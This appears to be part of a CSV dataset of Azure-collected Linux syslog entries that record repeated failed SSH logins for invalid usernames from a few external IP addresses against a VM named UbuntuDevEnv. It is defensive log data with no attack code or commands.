+3510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:43:49,UbuntuDevEnv,2019-06-26 12:43:48,auth,UbuntuDevEnv,info,Invalid user blog from 27.106.45.6 port 57359,115408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,blog,27.106.45.6,57359,,
+3511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:43:49,UbuntuDevEnv,2019-06-26 12:43:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:43:49,UbuntuDevEnv,2019-06-26 12:43:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,115408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:43:51,UbuntuDevEnv,2019-06-26 12:43:50,auth,UbuntuDevEnv,info,Failed password for invalid user blog from 27.106.45.6 port 57359 ssh2,115408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,blog,27.106.45.6,57359,,
+3514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:43:51,UbuntuDevEnv,2019-06-26 12:43:50,auth,UbuntuDevEnv,info,Disconnected from invalid user blog 27.106.45.6 port 57359 [preauth],115408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,blog,27.106.45.6,57359,,
+3515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:43:51,UbuntuDevEnv,2019-06-26 12:43:50,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 57359:11: Bye Bye [preauth],115408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,57359,,
+3516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:27,UbuntuDevEnv,2019-06-26 12:45:26,auth,UbuntuDevEnv,info,Invalid user marketing from 139.199.34.112 port 55150,115780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,139.199.34.1,55150,,
+3517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:27,UbuntuDevEnv,2019-06-26 12:45:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,115780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:27,UbuntuDevEnv,2019-06-26 12:45:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:29,UbuntuDevEnv,2019-06-26 12:45:28,auth,UbuntuDevEnv,info,Failed password for invalid user marketing from 139.199.34.112 port 55150 ssh2,115780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,139.199.34.1,55150,,
+3520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:29,UbuntuDevEnv,2019-06-26 12:45:29,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 55150:11: Bye Bye [preauth],115780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,55150,,
+3521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:29,UbuntuDevEnv,2019-06-26 12:45:29,auth,UbuntuDevEnv,info,Disconnected from invalid user marketing 139.199.34.112 port 55150 [preauth],115780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,139.199.34.1,55150,,
+3522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:30,UbuntuDevEnv,2019-06-26 12:45:29,auth,UbuntuDevEnv,info,Invalid user activemq from 27.106.45.6 port 37553,115863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,activemq,27.106.45.6,37553,,
+3523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:30,UbuntuDevEnv,2019-06-26 12:45:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:30,UbuntuDevEnv,2019-06-26 12:45:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,115863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:32,UbuntuDevEnv,2019-06-26 12:45:31,auth,UbuntuDevEnv,info,Failed password for invalid user activemq from 27.106.45.6 port 37553 ssh2,115863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,activemq,27.106.45.6,37553,,
+3526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:32,UbuntuDevEnv,2019-06-26 12:45:31,auth,UbuntuDevEnv,info,Disconnected from invalid user activemq 27.106.45.6 port 37553 [preauth],115863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,activemq,27.106.45.6,37553,,
+3527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:32,UbuntuDevEnv,2019-06-26 12:45:31,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 37553:11: Bye Bye [preauth],115863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,37553,,
+3528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:50,UbuntuDevEnv,2019-06-26 12:45:50,auth,UbuntuDevEnv,info,Invalid user fax from 194.228.3.191 port 41040,115930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fax,194.228.3.1,41040,,
+3529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:50,UbuntuDevEnv,2019-06-26 12:45:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:50,UbuntuDevEnv,2019-06-26 12:45:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,115930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:53,UbuntuDevEnv,2019-06-26 12:45:52,auth,UbuntuDevEnv,info,Failed password for invalid user fax from 194.228.3.191 port 41040 ssh2,115930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fax,194.228.3.1,41040,,
+3532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:53,UbuntuDevEnv,2019-06-26 12:45:52,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 41040:11: Bye Bye [preauth],115930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,41040,,
+3533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:45:53,UbuntuDevEnv,2019-06-26 12:45:52,auth,UbuntuDevEnv,info,Disconnected from invalid user fax 194.228.3.191 port 41040 [preauth],115930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fax,194.228.3.1,41040,,
+3534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:16,UbuntuDevEnv,2019-06-26 12:47:15,auth,UbuntuDevEnv,info,Invalid user accounts from 27.106.45.6 port 45985,116233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,accounts,27.106.45.6,45985,,
+3535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:16,UbuntuDevEnv,2019-06-26 12:47:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,116233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:16,UbuntuDevEnv,2019-06-26 12:47:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:18,UbuntuDevEnv,2019-06-26 12:47:17,auth,UbuntuDevEnv,info,Failed password for invalid user accounts from 27.106.45.6 port 45985 ssh2,116233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,accounts,27.106.45.6,45985,,
+3538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:18,UbuntuDevEnv,2019-06-26 12:47:18,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 45985:11: Bye Bye [preauth],116233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,45985,,
+3539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:18,UbuntuDevEnv,2019-06-26 12:47:18,auth,UbuntuDevEnv,info,Disconnected from invalid user accounts 27.106.45.6 port 45985 [preauth],116233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,accounts,27.106.45.6,45985,,
+3540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:24,UbuntuDevEnv,2019-06-26 12:47:23,auth,UbuntuDevEnv,info,Invalid user sublink from 194.228.3.191 port 49560,116262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,194.228.3.1,49560,,
+3541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:24,UbuntuDevEnv,2019-06-26 12:47:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:24,UbuntuDevEnv,2019-06-26 12:47:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,116262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:26,UbuntuDevEnv,2019-06-26 12:47:25,auth,UbuntuDevEnv,info,Failed password for invalid user sublink from 194.228.3.191 port 49560 ssh2,116262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,194.228.3.1,49560,,
+3544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:26,UbuntuDevEnv,2019-06-26 12:47:25,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 49560:11: Bye Bye [preauth],116262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,49560,,
+3545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:47:26,UbuntuDevEnv,2019-06-26 12:47:25,auth,UbuntuDevEnv,info,Disconnected from invalid user sublink 194.228.3.191 port 49560 [preauth],116262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,194.228.3.1,49560,,
+3546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:51,UbuntuDevEnv,2019-06-26 12:48:50,auth,UbuntuDevEnv,info,Invalid user groupoffice from 194.228.3.191 port 58078,116567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,groupoffice,194.228.3.1,58078,,
+3547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:51,UbuntuDevEnv,2019-06-26 12:48:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,116567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:51,UbuntuDevEnv,2019-06-26 12:48:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:53,UbuntuDevEnv,2019-06-26 12:48:52,auth,UbuntuDevEnv,info,Failed password for invalid user groupoffice from 194.228.3.191 port 58078 ssh2,116567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,groupoffice,194.228.3.1,58078,,
+3550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:53,UbuntuDevEnv,2019-06-26 12:48:52,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 58078:11: Bye Bye [preauth],116567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,58078,,
+3551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:53,UbuntuDevEnv,2019-06-26 12:48:52,auth,UbuntuDevEnv,info,Disconnected from invalid user groupoffice 194.228.3.191 port 58078 [preauth],116567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,groupoffice,194.228.3.1,58078,,
+3552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:57,UbuntuDevEnv,2019-06-26 12:48:56,auth,UbuntuDevEnv,info,Invalid user charles from 27.106.45.6 port 54412,116589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,27.106.45.6,54412,,
+3553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:57,UbuntuDevEnv,2019-06-26 12:48:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,116589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:57,UbuntuDevEnv,2019-06-26 12:48:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:59,UbuntuDevEnv,2019-06-26 12:48:58,auth,UbuntuDevEnv,info,Failed password for invalid user charles from 27.106.45.6 port 54412 ssh2,116589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,27.106.45.6,54412,,
+3556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:59,UbuntuDevEnv,2019-06-26 12:48:58,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 54412:11: Bye Bye [preauth],116589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,54412,,
+3557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:48:59,UbuntuDevEnv,2019-06-26 12:48:58,auth,UbuntuDevEnv,info,Disconnected from invalid user charles 27.106.45.6 port 54412 [preauth],116589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,27.106.45.6,54412,,
+3558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:45,UbuntuDevEnv,2019-06-26 12:51:44,auth,UbuntuDevEnv,info,Invalid user uftp from 194.228.3.191 port 46877,117275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,194.228.3.1,46877,,
+3559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:45,UbuntuDevEnv,2019-06-26 12:51:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,117275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:45,UbuntuDevEnv,2019-06-26 12:51:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:47,UbuntuDevEnv,2019-06-26 12:51:46,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 194.228.3.191 port 46877 ssh2,117275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,194.228.3.1,46877,,
+3562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:47,UbuntuDevEnv,2019-06-26 12:51:46,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 194.228.3.191 port 46877 [preauth],117275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,194.228.3.1,46877,,
+3563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:51:47,UbuntuDevEnv,2019-06-26 12:51:46,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 46877:11: Bye Bye [preauth],117275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,46877,,
+3564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:52:16,UbuntuDevEnv,2019-06-26 12:52:15,auth,UbuntuDevEnv,info,Invalid user postgres from 27.106.45.6 port 43021,117384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,27.106.45.6,43021,,
+3565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:52:16,UbuntuDevEnv,2019-06-26 12:52:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:52:16,UbuntuDevEnv,2019-06-26 12:52:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,117384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:52:18,UbuntuDevEnv,2019-06-26 12:52:18,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 27.106.45.6 port 43021 ssh2,117384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,27.106.45.6,43021,,
+3568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:52:18,UbuntuDevEnv,2019-06-26 12:52:18,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 43021:11: Bye Bye [preauth],117384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,43021,,
+3569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:52:18,UbuntuDevEnv,2019-06-26 12:52:18,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 27.106.45.6 port 43021 [preauth],117384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,27.106.45.6,43021,,
